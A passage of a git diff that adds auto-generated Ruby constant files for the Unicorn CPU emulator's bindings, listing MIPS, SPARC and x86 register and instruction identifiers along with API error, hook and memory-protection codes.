UC_MIPS_REG_CC6 = 55 + UC_MIPS_REG_CC7 = 56 + +# FPU registers + UC_MIPS_REG_F0 = 57 + UC_MIPS_REG_F1 = 58 + UC_MIPS_REG_F2 = 59 + UC_MIPS_REG_F3 = 60 + UC_MIPS_REG_F4 = 61 + UC_MIPS_REG_F5 = 62 + UC_MIPS_REG_F6 = 63 + UC_MIPS_REG_F7 = 64 + UC_MIPS_REG_F8 = 65 + UC_MIPS_REG_F9 = 66 + UC_MIPS_REG_F10 = 67 + UC_MIPS_REG_F11 = 68 + UC_MIPS_REG_F12 = 69 + UC_MIPS_REG_F13 = 70 + UC_MIPS_REG_F14 = 71 + UC_MIPS_REG_F15 = 72 + UC_MIPS_REG_F16 = 73 + UC_MIPS_REG_F17 = 74 + UC_MIPS_REG_F18 = 75 + UC_MIPS_REG_F19 = 76 + UC_MIPS_REG_F20 = 77 + UC_MIPS_REG_F21 = 78 + UC_MIPS_REG_F22 = 79 + UC_MIPS_REG_F23 = 80 + UC_MIPS_REG_F24 = 81 + UC_MIPS_REG_F25 = 82 + UC_MIPS_REG_F26 = 83 + UC_MIPS_REG_F27 = 84 + UC_MIPS_REG_F28 = 85 + UC_MIPS_REG_F29 = 86 + UC_MIPS_REG_F30 = 87 + UC_MIPS_REG_F31 = 88 + UC_MIPS_REG_FCC0 = 89 + UC_MIPS_REG_FCC1 = 90 + UC_MIPS_REG_FCC2 = 91 + UC_MIPS_REG_FCC3 = 92 + UC_MIPS_REG_FCC4 = 93 + UC_MIPS_REG_FCC5 = 94 + UC_MIPS_REG_FCC6 = 95 + UC_MIPS_REG_FCC7 = 96 + +# AFPR128 + UC_MIPS_REG_W0 = 97 + UC_MIPS_REG_W1 = 98 + UC_MIPS_REG_W2 = 99 + UC_MIPS_REG_W3 = 100 + UC_MIPS_REG_W4 = 101 + UC_MIPS_REG_W5 = 102 + UC_MIPS_REG_W6 = 103 + UC_MIPS_REG_W7 = 104 + UC_MIPS_REG_W8 = 105 + UC_MIPS_REG_W9 = 106 + UC_MIPS_REG_W10 = 107 + UC_MIPS_REG_W11 = 108 + UC_MIPS_REG_W12 = 109 + UC_MIPS_REG_W13 = 110 + UC_MIPS_REG_W14 = 111 + UC_MIPS_REG_W15 = 112 + UC_MIPS_REG_W16 = 113 + UC_MIPS_REG_W17 = 114 + UC_MIPS_REG_W18 = 115 + UC_MIPS_REG_W19 = 116 + UC_MIPS_REG_W20 = 117 + UC_MIPS_REG_W21 = 118 + UC_MIPS_REG_W22 = 119 + UC_MIPS_REG_W23 = 120 + UC_MIPS_REG_W24 = 121 + UC_MIPS_REG_W25 = 122 + UC_MIPS_REG_W26 = 123 + UC_MIPS_REG_W27 = 124 + UC_MIPS_REG_W28 = 125 + UC_MIPS_REG_W29 = 126 + UC_MIPS_REG_W30 = 127 + UC_MIPS_REG_W31 = 128 + UC_MIPS_REG_HI = 129 + UC_MIPS_REG_LO = 130 + UC_MIPS_REG_P0 = 131 + UC_MIPS_REG_P1 = 132 + UC_MIPS_REG_P2 = 133 + UC_MIPS_REG_MPL0 = 134 + UC_MIPS_REG_MPL1 = 135 + UC_MIPS_REG_MPL2 = 136 + UC_MIPS_REG_CP0_CONFIG3 = 137 + UC_MIPS_REG_CP0_USERLOCAL = 138 + UC_MIPS_REG_ENDING = 139 + UC_MIPS_REG_ZERO = 2 + UC_MIPS_REG_AT = 3 + UC_MIPS_REG_V0 = 4 + UC_MIPS_REG_V1 = 5 + UC_MIPS_REG_A0 = 6 + UC_MIPS_REG_A1 = 7 + UC_MIPS_REG_A2 = 8 + UC_MIPS_REG_A3 = 9 + UC_MIPS_REG_T0 = 10 + UC_MIPS_REG_T1 = 11 + UC_MIPS_REG_T2 = 12 + UC_MIPS_REG_T3 = 13 + UC_MIPS_REG_T4 = 14 + UC_MIPS_REG_T5 = 15 + UC_MIPS_REG_T6 = 16 + UC_MIPS_REG_T7 = 17 + UC_MIPS_REG_S0 = 18 + UC_MIPS_REG_S1 = 19 + UC_MIPS_REG_S2 = 20 + UC_MIPS_REG_S3 = 21 + UC_MIPS_REG_S4 = 22 + UC_MIPS_REG_S5 = 23 + UC_MIPS_REG_S6 = 24 + UC_MIPS_REG_S7 = 25 + UC_MIPS_REG_T8 = 26 + UC_MIPS_REG_T9 = 27 + UC_MIPS_REG_K0 = 28 + UC_MIPS_REG_K1 = 29 + UC_MIPS_REG_GP = 30 + UC_MIPS_REG_SP = 31 + UC_MIPS_REG_FP = 32 + UC_MIPS_REG_S8 = 32 + UC_MIPS_REG_RA = 33 + UC_MIPS_REG_HI0 = 45 + UC_MIPS_REG_HI1 = 46 + UC_MIPS_REG_HI2 = 47 + UC_MIPS_REG_HI3 = 48 + UC_MIPS_REG_LO0 = 45 + UC_MIPS_REG_LO1 = 46 + UC_MIPS_REG_LO2 = 47 + UC_MIPS_REG_LO3 = 48 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/sparc_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/sparc_const.rb new file mode 100644 index 0000000..b5c4247 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/sparc_const.rb @@ -0,0 +1,99 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.rb] + +module UnicornEngine + +# SPARC registers + + UC_SPARC_REG_INVALID = 0 + UC_SPARC_REG_F0 = 1 + UC_SPARC_REG_F1 = 2 + UC_SPARC_REG_F2 = 3 + UC_SPARC_REG_F3 = 4 + UC_SPARC_REG_F4 = 5 + UC_SPARC_REG_F5 = 6 + UC_SPARC_REG_F6 = 7 + UC_SPARC_REG_F7 = 8 + UC_SPARC_REG_F8 = 9 + UC_SPARC_REG_F9 = 10 + UC_SPARC_REG_F10 = 11 + UC_SPARC_REG_F11 = 12 + UC_SPARC_REG_F12 = 13 + UC_SPARC_REG_F13 = 14 + UC_SPARC_REG_F14 = 15 + UC_SPARC_REG_F15 = 16 + UC_SPARC_REG_F16 = 17 + UC_SPARC_REG_F17 = 18 + UC_SPARC_REG_F18 = 19 + UC_SPARC_REG_F19 = 20 + UC_SPARC_REG_F20 = 21 + UC_SPARC_REG_F21 = 22 + UC_SPARC_REG_F22 = 23 + UC_SPARC_REG_F23 = 24 + UC_SPARC_REG_F24 = 25 + UC_SPARC_REG_F25 = 26 + UC_SPARC_REG_F26 = 27 + UC_SPARC_REG_F27 = 28 + UC_SPARC_REG_F28 = 29 + UC_SPARC_REG_F29 = 30 + UC_SPARC_REG_F30 = 31 + UC_SPARC_REG_F31 = 32 + UC_SPARC_REG_F32 = 33 + UC_SPARC_REG_F34 = 34 + UC_SPARC_REG_F36 = 35 + UC_SPARC_REG_F38 = 36 + UC_SPARC_REG_F40 = 37 + UC_SPARC_REG_F42 = 38 + UC_SPARC_REG_F44 = 39 + UC_SPARC_REG_F46 = 40 + UC_SPARC_REG_F48 = 41 + UC_SPARC_REG_F50 = 42 + UC_SPARC_REG_F52 = 43 + UC_SPARC_REG_F54 = 44 + UC_SPARC_REG_F56 = 45 + UC_SPARC_REG_F58 = 46 + UC_SPARC_REG_F60 = 47 + UC_SPARC_REG_F62 = 48 + UC_SPARC_REG_FCC0 = 49 + UC_SPARC_REG_FCC1 = 50 + UC_SPARC_REG_FCC2 = 51 + UC_SPARC_REG_FCC3 = 52 + UC_SPARC_REG_G0 = 53 + UC_SPARC_REG_G1 = 54 + UC_SPARC_REG_G2 = 55 + UC_SPARC_REG_G3 = 56 + UC_SPARC_REG_G4 = 57 + UC_SPARC_REG_G5 = 58 + UC_SPARC_REG_G6 = 59 + UC_SPARC_REG_G7 = 60 + UC_SPARC_REG_I0 = 61 + UC_SPARC_REG_I1 = 62 + UC_SPARC_REG_I2 = 63 + UC_SPARC_REG_I3 = 64 + UC_SPARC_REG_I4 = 65 + UC_SPARC_REG_I5 = 66 + UC_SPARC_REG_FP = 67 + UC_SPARC_REG_I7 = 68 + UC_SPARC_REG_ICC = 69 + UC_SPARC_REG_L0 = 70 + UC_SPARC_REG_L1 = 71 + UC_SPARC_REG_L2 = 72 + UC_SPARC_REG_L3 = 73 + UC_SPARC_REG_L4 = 74 + UC_SPARC_REG_L5 = 75 + UC_SPARC_REG_L6 = 76 + UC_SPARC_REG_L7 = 77 + UC_SPARC_REG_O0 = 78 + UC_SPARC_REG_O1 = 79 + UC_SPARC_REG_O2 = 80 + UC_SPARC_REG_O3 = 81 + UC_SPARC_REG_O4 = 82 + UC_SPARC_REG_O5 = 83 + UC_SPARC_REG_SP = 84 + UC_SPARC_REG_O7 = 85 + UC_SPARC_REG_Y = 86 + UC_SPARC_REG_XCC = 87 + UC_SPARC_REG_PC = 88 + UC_SPARC_REG_ENDING = 89 + UC_SPARC_REG_O6 = 84 + UC_SPARC_REG_I6 = 67 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/unicorn_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/unicorn_const.rb new file mode 100644 index 0000000..178fac6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/unicorn_const.rb @@ -0,0 +1,111 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.rb] + +module UnicornEngine + UC_API_MAJOR = 1 + + UC_API_MINOR = 0 + UC_VERSION_MAJOR = 1 + + UC_VERSION_MINOR = 0 + UC_VERSION_EXTRA = 2 + UC_SECOND_SCALE = 1000000 + UC_MILISECOND_SCALE = 1000 + UC_ARCH_ARM = 1 + UC_ARCH_ARM64 = 2 + UC_ARCH_MIPS = 3 + UC_ARCH_X86 = 4 + UC_ARCH_PPC = 5 + UC_ARCH_SPARC = 6 + UC_ARCH_M68K = 7 + UC_ARCH_MAX = 8 + + UC_MODE_LITTLE_ENDIAN = 0 + UC_MODE_BIG_ENDIAN = 1073741824 + + UC_MODE_ARM = 0 + UC_MODE_THUMB = 16 + UC_MODE_MCLASS = 32 + UC_MODE_V8 = 64 + UC_MODE_ARM926 = 128 + UC_MODE_ARM946 = 256 + UC_MODE_ARM1176 = 512 + UC_MODE_MICRO = 16 + UC_MODE_MIPS3 = 32 + UC_MODE_MIPS32R6 = 64 + UC_MODE_MIPS32 = 4 + UC_MODE_MIPS64 = 8 + UC_MODE_16 = 2 + UC_MODE_32 = 4 + UC_MODE_64 = 8 + UC_MODE_PPC32 = 4 + UC_MODE_PPC64 = 8 + UC_MODE_QPX = 16 + UC_MODE_SPARC32 = 4 + UC_MODE_SPARC64 = 8 + UC_MODE_V9 = 16 + + UC_ERR_OK = 0 + UC_ERR_NOMEM = 1 + UC_ERR_ARCH = 2 + UC_ERR_HANDLE = 3 + UC_ERR_MODE = 4 + UC_ERR_VERSION = 5 + UC_ERR_READ_UNMAPPED = 6 + UC_ERR_WRITE_UNMAPPED = 7 + UC_ERR_FETCH_UNMAPPED = 8 + UC_ERR_HOOK = 9 + UC_ERR_INSN_INVALID = 10 + UC_ERR_MAP = 11 + UC_ERR_WRITE_PROT = 12 + UC_ERR_READ_PROT = 13 + UC_ERR_FETCH_PROT = 14 + UC_ERR_ARG = 15 + UC_ERR_READ_UNALIGNED = 16 + UC_ERR_WRITE_UNALIGNED = 17 + UC_ERR_FETCH_UNALIGNED = 18 + UC_ERR_HOOK_EXIST = 19 + UC_ERR_RESOURCE = 20 + UC_ERR_EXCEPTION = 21 + UC_MEM_READ = 16 + UC_MEM_WRITE = 17 + UC_MEM_FETCH = 18 + UC_MEM_READ_UNMAPPED = 19 + UC_MEM_WRITE_UNMAPPED = 20 + UC_MEM_FETCH_UNMAPPED = 21 + UC_MEM_WRITE_PROT = 22 + UC_MEM_READ_PROT = 23 + UC_MEM_FETCH_PROT = 24 + UC_MEM_READ_AFTER = 25 + UC_HOOK_INTR = 1 + UC_HOOK_INSN = 2 + UC_HOOK_CODE = 4 + UC_HOOK_BLOCK = 8 + UC_HOOK_MEM_READ_UNMAPPED = 16 + UC_HOOK_MEM_WRITE_UNMAPPED = 32 + UC_HOOK_MEM_FETCH_UNMAPPED = 64 + UC_HOOK_MEM_READ_PROT = 128 + UC_HOOK_MEM_WRITE_PROT = 256 + UC_HOOK_MEM_FETCH_PROT = 512 + UC_HOOK_MEM_READ = 1024 + UC_HOOK_MEM_WRITE = 2048 + UC_HOOK_MEM_FETCH = 4096 + UC_HOOK_MEM_READ_AFTER = 8192 + UC_HOOK_INSN_INVALID = 16384 + UC_HOOK_MEM_UNMAPPED = 112 + UC_HOOK_MEM_PROT = 896 + UC_HOOK_MEM_READ_INVALID = 144 + UC_HOOK_MEM_WRITE_INVALID = 288 + UC_HOOK_MEM_FETCH_INVALID = 576 + UC_HOOK_MEM_INVALID = 1008 + UC_HOOK_MEM_VALID = 7168 + UC_QUERY_MODE = 1 + UC_QUERY_PAGE_SIZE = 2 + UC_QUERY_ARCH = 3 + UC_QUERY_TIMEOUT = 4 + + UC_PROT_NONE = 0 + UC_PROT_READ = 1 + UC_PROT_WRITE = 2 + UC_PROT_EXEC = 4 + UC_PROT_ALL = 7 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/version.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/version.rb new file mode 100644 index 0000000..bca7c5f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/version.rb @@ -0,0 +1,3 @@ +module Unicorn + VERSION = "1.0.1" +end diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/x86_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/x86_const.rb new file mode 100644 index 0000000..8063eec --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/x86_const.rb @@ -0,0 +1,1602 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.rb] + +module UnicornEngine + +# X86 registers + + UC_X86_REG_INVALID = 0 + UC_X86_REG_AH = 1 + UC_X86_REG_AL = 2 + UC_X86_REG_AX = 3 + UC_X86_REG_BH = 4 + UC_X86_REG_BL = 5 + UC_X86_REG_BP = 6 + UC_X86_REG_BPL = 7 + UC_X86_REG_BX = 8 + UC_X86_REG_CH = 9 + UC_X86_REG_CL = 10 + UC_X86_REG_CS = 11 + UC_X86_REG_CX = 12 + UC_X86_REG_DH = 13 + UC_X86_REG_DI = 14 + UC_X86_REG_DIL = 15 + UC_X86_REG_DL = 16 + UC_X86_REG_DS = 17 + UC_X86_REG_DX = 18 + UC_X86_REG_EAX = 19 + UC_X86_REG_EBP = 20 + UC_X86_REG_EBX = 21 + UC_X86_REG_ECX = 22 + UC_X86_REG_EDI = 23 + UC_X86_REG_EDX = 24 + UC_X86_REG_EFLAGS = 25 + UC_X86_REG_EIP = 26 + UC_X86_REG_EIZ = 27 + UC_X86_REG_ES = 28 + UC_X86_REG_ESI = 29 + UC_X86_REG_ESP = 30 + UC_X86_REG_FPSW = 31 + UC_X86_REG_FS = 32 + UC_X86_REG_GS = 33 + UC_X86_REG_IP = 34 + UC_X86_REG_RAX = 35 + UC_X86_REG_RBP = 36 + UC_X86_REG_RBX = 37 + UC_X86_REG_RCX = 38 + UC_X86_REG_RDI = 39 + UC_X86_REG_RDX = 40 + UC_X86_REG_RIP = 41 + UC_X86_REG_RIZ = 42 + UC_X86_REG_RSI = 43 + UC_X86_REG_RSP = 44 + UC_X86_REG_SI = 45 + UC_X86_REG_SIL = 46 + UC_X86_REG_SP = 47 + UC_X86_REG_SPL = 48 + UC_X86_REG_SS = 49 + UC_X86_REG_CR0 = 50 + UC_X86_REG_CR1 = 51 + UC_X86_REG_CR2 = 52 + UC_X86_REG_CR3 = 53 + UC_X86_REG_CR4 = 54 + UC_X86_REG_CR5 = 55 + UC_X86_REG_CR6 = 56 + UC_X86_REG_CR7 = 57 + UC_X86_REG_CR8 = 58 + UC_X86_REG_CR9 = 59 + UC_X86_REG_CR10 = 60 + UC_X86_REG_CR11 = 61 + UC_X86_REG_CR12 = 62 + UC_X86_REG_CR13 = 63 + UC_X86_REG_CR14 = 64 + UC_X86_REG_CR15 = 65 + UC_X86_REG_DR0 = 66 + UC_X86_REG_DR1 = 67 + UC_X86_REG_DR2 = 68 + UC_X86_REG_DR3 = 69 + UC_X86_REG_DR4 = 70 + UC_X86_REG_DR5 = 71 + UC_X86_REG_DR6 = 72 + UC_X86_REG_DR7 = 73 + UC_X86_REG_DR8 = 74 + UC_X86_REG_DR9 = 75 + UC_X86_REG_DR10 = 76 + UC_X86_REG_DR11 = 77 + UC_X86_REG_DR12 = 78 + UC_X86_REG_DR13 = 79 + UC_X86_REG_DR14 = 80 + UC_X86_REG_DR15 = 81 + UC_X86_REG_FP0 = 82 + UC_X86_REG_FP1 = 83 + UC_X86_REG_FP2 = 84 + UC_X86_REG_FP3 = 85 + UC_X86_REG_FP4 = 86 + UC_X86_REG_FP5 = 87 + UC_X86_REG_FP6 = 88 + UC_X86_REG_FP7 = 89 + UC_X86_REG_K0 = 90 + UC_X86_REG_K1 = 91 + UC_X86_REG_K2 = 92 + UC_X86_REG_K3 = 93 + UC_X86_REG_K4 = 94 + UC_X86_REG_K5 = 95 + UC_X86_REG_K6 = 96 + UC_X86_REG_K7 = 97 + UC_X86_REG_MM0 = 98 + UC_X86_REG_MM1 = 99 + UC_X86_REG_MM2 = 100 + UC_X86_REG_MM3 = 101 + UC_X86_REG_MM4 = 102 + UC_X86_REG_MM5 = 103 + UC_X86_REG_MM6 = 104 + UC_X86_REG_MM7 = 105 + UC_X86_REG_R8 = 106 + UC_X86_REG_R9 = 107 + UC_X86_REG_R10 = 108 + UC_X86_REG_R11 = 109 + UC_X86_REG_R12 = 110 + UC_X86_REG_R13 = 111 + UC_X86_REG_R14 = 112 + UC_X86_REG_R15 = 113 + UC_X86_REG_ST0 = 114 + UC_X86_REG_ST1 = 115 + UC_X86_REG_ST2 = 116 + UC_X86_REG_ST3 = 117 + UC_X86_REG_ST4 = 118 + UC_X86_REG_ST5 = 119 + UC_X86_REG_ST6 = 120 + UC_X86_REG_ST7 = 121 + UC_X86_REG_XMM0 = 122 + UC_X86_REG_XMM1 = 123 + UC_X86_REG_XMM2 = 124 + UC_X86_REG_XMM3 = 125 + UC_X86_REG_XMM4 = 126 + UC_X86_REG_XMM5 = 127 + UC_X86_REG_XMM6 = 128 + UC_X86_REG_XMM7 = 129 + UC_X86_REG_XMM8 = 130 + UC_X86_REG_XMM9 = 131 + UC_X86_REG_XMM10 = 132 + UC_X86_REG_XMM11 = 133 + UC_X86_REG_XMM12 = 134 + UC_X86_REG_XMM13 = 135 + UC_X86_REG_XMM14 = 136 + UC_X86_REG_XMM15 = 137 + UC_X86_REG_XMM16 = 138 + UC_X86_REG_XMM17 = 139 + UC_X86_REG_XMM18 = 140 + UC_X86_REG_XMM19 = 141 + UC_X86_REG_XMM20 = 142 + UC_X86_REG_XMM21 = 143 + UC_X86_REG_XMM22 = 144 + UC_X86_REG_XMM23 = 145 + UC_X86_REG_XMM24 = 146 + UC_X86_REG_XMM25 = 147 + UC_X86_REG_XMM26 = 148 + UC_X86_REG_XMM27 = 149 + UC_X86_REG_XMM28 = 150 + UC_X86_REG_XMM29 = 151 + UC_X86_REG_XMM30 = 152 + UC_X86_REG_XMM31 = 153 + UC_X86_REG_YMM0 = 154 + UC_X86_REG_YMM1 = 155 + UC_X86_REG_YMM2 = 156 + UC_X86_REG_YMM3 = 157 + UC_X86_REG_YMM4 = 158 + UC_X86_REG_YMM5 = 159 + UC_X86_REG_YMM6 = 160 + UC_X86_REG_YMM7 = 161 + UC_X86_REG_YMM8 = 162 + UC_X86_REG_YMM9 = 163 + UC_X86_REG_YMM10 = 164 + UC_X86_REG_YMM11 = 165 + UC_X86_REG_YMM12 = 166 + UC_X86_REG_YMM13 = 167 + UC_X86_REG_YMM14 = 168 + UC_X86_REG_YMM15 = 169 + UC_X86_REG_YMM16 = 170 + UC_X86_REG_YMM17 = 171 + UC_X86_REG_YMM18 = 172 + UC_X86_REG_YMM19 = 173 + UC_X86_REG_YMM20 = 174 + UC_X86_REG_YMM21 = 175 + UC_X86_REG_YMM22 = 176 + UC_X86_REG_YMM23 = 177 + UC_X86_REG_YMM24 = 178 + UC_X86_REG_YMM25 = 179 + UC_X86_REG_YMM26 = 180 + UC_X86_REG_YMM27 = 181 + UC_X86_REG_YMM28 = 182 + UC_X86_REG_YMM29 = 183 + UC_X86_REG_YMM30 = 184 + UC_X86_REG_YMM31 = 185 + UC_X86_REG_ZMM0 = 186 + UC_X86_REG_ZMM1 = 187 + UC_X86_REG_ZMM2 = 188 + UC_X86_REG_ZMM3 = 189 + UC_X86_REG_ZMM4 = 190 + UC_X86_REG_ZMM5 = 191 + UC_X86_REG_ZMM6 = 192 + UC_X86_REG_ZMM7 = 193 + UC_X86_REG_ZMM8 = 194 + UC_X86_REG_ZMM9 = 195 + UC_X86_REG_ZMM10 = 196 + UC_X86_REG_ZMM11 = 197 + UC_X86_REG_ZMM12 = 198 + UC_X86_REG_ZMM13 = 199 + UC_X86_REG_ZMM14 = 200 + UC_X86_REG_ZMM15 = 201 + UC_X86_REG_ZMM16 = 202 + UC_X86_REG_ZMM17 = 203 + UC_X86_REG_ZMM18 = 204 + UC_X86_REG_ZMM19 = 205 + UC_X86_REG_ZMM20 = 206 + UC_X86_REG_ZMM21 = 207 + UC_X86_REG_ZMM22 = 208 + UC_X86_REG_ZMM23 = 209 + UC_X86_REG_ZMM24 = 210 + UC_X86_REG_ZMM25 = 211 + UC_X86_REG_ZMM26 = 212 + UC_X86_REG_ZMM27 = 213 + UC_X86_REG_ZMM28 = 214 + UC_X86_REG_ZMM29 = 215 + UC_X86_REG_ZMM30 = 216 + UC_X86_REG_ZMM31 = 217 + UC_X86_REG_R8B = 218 + UC_X86_REG_R9B = 219 + UC_X86_REG_R10B = 220 + UC_X86_REG_R11B = 221 + UC_X86_REG_R12B = 222 + UC_X86_REG_R13B = 223 + UC_X86_REG_R14B = 224 + UC_X86_REG_R15B = 225 + UC_X86_REG_R8D = 226 + UC_X86_REG_R9D = 227 + UC_X86_REG_R10D = 228 + UC_X86_REG_R11D = 229 + UC_X86_REG_R12D = 230 + UC_X86_REG_R13D = 231 + UC_X86_REG_R14D = 232 + UC_X86_REG_R15D = 233 + UC_X86_REG_R8W = 234 + UC_X86_REG_R9W = 235 + UC_X86_REG_R10W = 236 + UC_X86_REG_R11W = 237 + UC_X86_REG_R12W = 238 + UC_X86_REG_R13W = 239 + UC_X86_REG_R14W = 240 + UC_X86_REG_R15W = 241 + UC_X86_REG_IDTR = 242 + UC_X86_REG_GDTR = 243 + UC_X86_REG_LDTR = 244 + UC_X86_REG_TR = 245 + UC_X86_REG_FPCW = 246 + UC_X86_REG_FPTAG = 247 + UC_X86_REG_MSR = 248 + UC_X86_REG_MXCSR = 249 + UC_X86_REG_FS_BASE = 250 + UC_X86_REG_GS_BASE = 251 + UC_X86_REG_ENDING = 252 + +# X86 instructions + + UC_X86_INS_INVALID = 0 + UC_X86_INS_AAA = 1 + UC_X86_INS_AAD = 2 + UC_X86_INS_AAM = 3 + UC_X86_INS_AAS = 4 + UC_X86_INS_FABS = 5 + UC_X86_INS_ADC = 6 + UC_X86_INS_ADCX = 7 + UC_X86_INS_ADD = 8 + UC_X86_INS_ADDPD = 9 + UC_X86_INS_ADDPS = 10 + UC_X86_INS_ADDSD = 11 + UC_X86_INS_ADDSS = 12 + UC_X86_INS_ADDSUBPD = 13 + UC_X86_INS_ADDSUBPS = 14 + UC_X86_INS_FADD = 15 + UC_X86_INS_FIADD = 16 + UC_X86_INS_FADDP = 17 + UC_X86_INS_ADOX = 18 + UC_X86_INS_AESDECLAST = 19 + UC_X86_INS_AESDEC = 20 + UC_X86_INS_AESENCLAST = 21 + UC_X86_INS_AESENC = 22 + UC_X86_INS_AESIMC = 23 + UC_X86_INS_AESKEYGENASSIST = 24 + UC_X86_INS_AND = 25 + UC_X86_INS_ANDN = 26 + UC_X86_INS_ANDNPD = 27 + UC_X86_INS_ANDNPS = 28 + UC_X86_INS_ANDPD = 29 + UC_X86_INS_ANDPS = 30 + UC_X86_INS_ARPL = 31 + UC_X86_INS_BEXTR = 32 + UC_X86_INS_BLCFILL = 33 + UC_X86_INS_BLCI = 34 + UC_X86_INS_BLCIC = 35 + UC_X86_INS_BLCMSK = 36 + UC_X86_INS_BLCS = 37 + UC_X86_INS_BLENDPD = 38 + UC_X86_INS_BLENDPS = 39 + UC_X86_INS_BLENDVPD = 40 + UC_X86_INS_BLENDVPS = 41 + UC_X86_INS_BLSFILL = 42 + UC_X86_INS_BLSI = 43 + UC_X86_INS_BLSIC = 44 + UC_X86_INS_BLSMSK = 45 + UC_X86_INS_BLSR = 46 + UC_X86_INS_BOUND = 47 + UC_X86_INS_BSF = 48 + UC_X86_INS_BSR = 49 + UC_X86_INS_BSWAP = 50 + UC_X86_INS_BT = 51 + UC_X86_INS_BTC = 52 + UC_X86_INS_BTR = 53 + UC_X86_INS_BTS = 54 + UC_X86_INS_BZHI = 55 + UC_X86_INS_CALL = 56 + UC_X86_INS_CBW = 57 + UC_X86_INS_CDQ = 58 + UC_X86_INS_CDQE = 59 + UC_X86_INS_FCHS = 60 + UC_X86_INS_CLAC = 61 + UC_X86_INS_CLC = 62 + UC_X86_INS_CLD = 63 + UC_X86_INS_CLFLUSH = 64 + UC_X86_INS_CLFLUSHOPT = 65 + UC_X86_INS_CLGI = 66 + UC_X86_INS_CLI = 67 + UC_X86_INS_CLTS = 68 + UC_X86_INS_CLWB = 69 + UC_X86_INS_CMC = 70 + UC_X86_INS_CMOVA = 71 + UC_X86_INS_CMOVAE = 72 + UC_X86_INS_CMOVB = 73 + UC_X86_INS_CMOVBE = 74 + UC_X86_INS_FCMOVBE = 75 + UC_X86_INS_FCMOVB = 76 + UC_X86_INS_CMOVE = 77 + UC_X86_INS_FCMOVE = 78 + UC_X86_INS_CMOVG = 79 + UC_X86_INS_CMOVGE = 80 + UC_X86_INS_CMOVL = 81 + UC_X86_INS_CMOVLE = 82 + UC_X86_INS_FCMOVNBE = 83 + UC_X86_INS_FCMOVNB = 84 + UC_X86_INS_CMOVNE = 85 + UC_X86_INS_FCMOVNE = 86 + UC_X86_INS_CMOVNO = 87 + UC_X86_INS_CMOVNP = 88 + UC_X86_INS_FCMOVNU = 89 + UC_X86_INS_CMOVNS = 90 + UC_X86_INS_CMOVO = 91 + UC_X86_INS_CMOVP = 92 + UC_X86_INS_FCMOVU = 93 + UC_X86_INS_CMOVS = 94 + UC_X86_INS_CMP = 95 + UC_X86_INS_CMPPD = 96 + UC_X86_INS_CMPPS = 97 + UC_X86_INS_CMPSB = 98 + UC_X86_INS_CMPSD = 99 + UC_X86_INS_CMPSQ = 100 + UC_X86_INS_CMPSS = 101 + UC_X86_INS_CMPSW = 102 + UC_X86_INS_CMPXCHG16B = 103 + UC_X86_INS_CMPXCHG = 104 + UC_X86_INS_CMPXCHG8B = 105 + UC_X86_INS_COMISD = 106 + UC_X86_INS_COMISS = 107 + UC_X86_INS_FCOMP = 108 + UC_X86_INS_FCOMPI = 109 + UC_X86_INS_FCOMI = 110 + UC_X86_INS_FCOM = 111 + UC_X86_INS_FCOS = 112 + UC_X86_INS_CPUID = 113 + UC_X86_INS_CQO = 114 + UC_X86_INS_CRC32 = 115 + UC_X86_INS_CVTDQ2PD = 116 + UC_X86_INS_CVTDQ2PS = 117 + UC_X86_INS_CVTPD2DQ = 118 + UC_X86_INS_CVTPD2PS = 119 + UC_X86_INS_CVTPS2DQ = 120 + UC_X86_INS_CVTPS2PD = 121 + UC_X86_INS_CVTSD2SI = 122 + UC_X86_INS_CVTSD2SS = 123 + UC_X86_INS_CVTSI2SD = 124 + UC_X86_INS_CVTSI2SS = 125 + UC_X86_INS_CVTSS2SD = 126 + UC_X86_INS_CVTSS2SI = 127 + UC_X86_INS_CVTTPD2DQ = 128 + UC_X86_INS_CVTTPS2DQ = 129 + UC_X86_INS_CVTTSD2SI = 130 + UC_X86_INS_CVTTSS2SI = 131 + UC_X86_INS_CWD = 132 + UC_X86_INS_CWDE = 133 + UC_X86_INS_DAA = 134 + UC_X86_INS_DAS = 135 + UC_X86_INS_DATA16 = 136 + UC_X86_INS_DEC = 137 + UC_X86_INS_DIV = 138 + UC_X86_INS_DIVPD = 139 + UC_X86_INS_DIVPS = 140 + UC_X86_INS_FDIVR = 141 + UC_X86_INS_FIDIVR = 142 + UC_X86_INS_FDIVRP = 143 + UC_X86_INS_DIVSD = 144 + UC_X86_INS_DIVSS = 145 + UC_X86_INS_FDIV = 146 + UC_X86_INS_FIDIV = 147 + UC_X86_INS_FDIVP = 148 + UC_X86_INS_DPPD = 149 + UC_X86_INS_DPPS = 150 + UC_X86_INS_RET = 151 + UC_X86_INS_ENCLS = 152 + UC_X86_INS_ENCLU = 153 + UC_X86_INS_ENTER = 154 + UC_X86_INS_EXTRACTPS = 155 + UC_X86_INS_EXTRQ = 156 + UC_X86_INS_F2XM1 = 157 + UC_X86_INS_LCALL = 158 + UC_X86_INS_LJMP = 159 + UC_X86_INS_FBLD = 160 + UC_X86_INS_FBSTP = 161 + UC_X86_INS_FCOMPP = 162 + UC_X86_INS_FDECSTP = 163 + 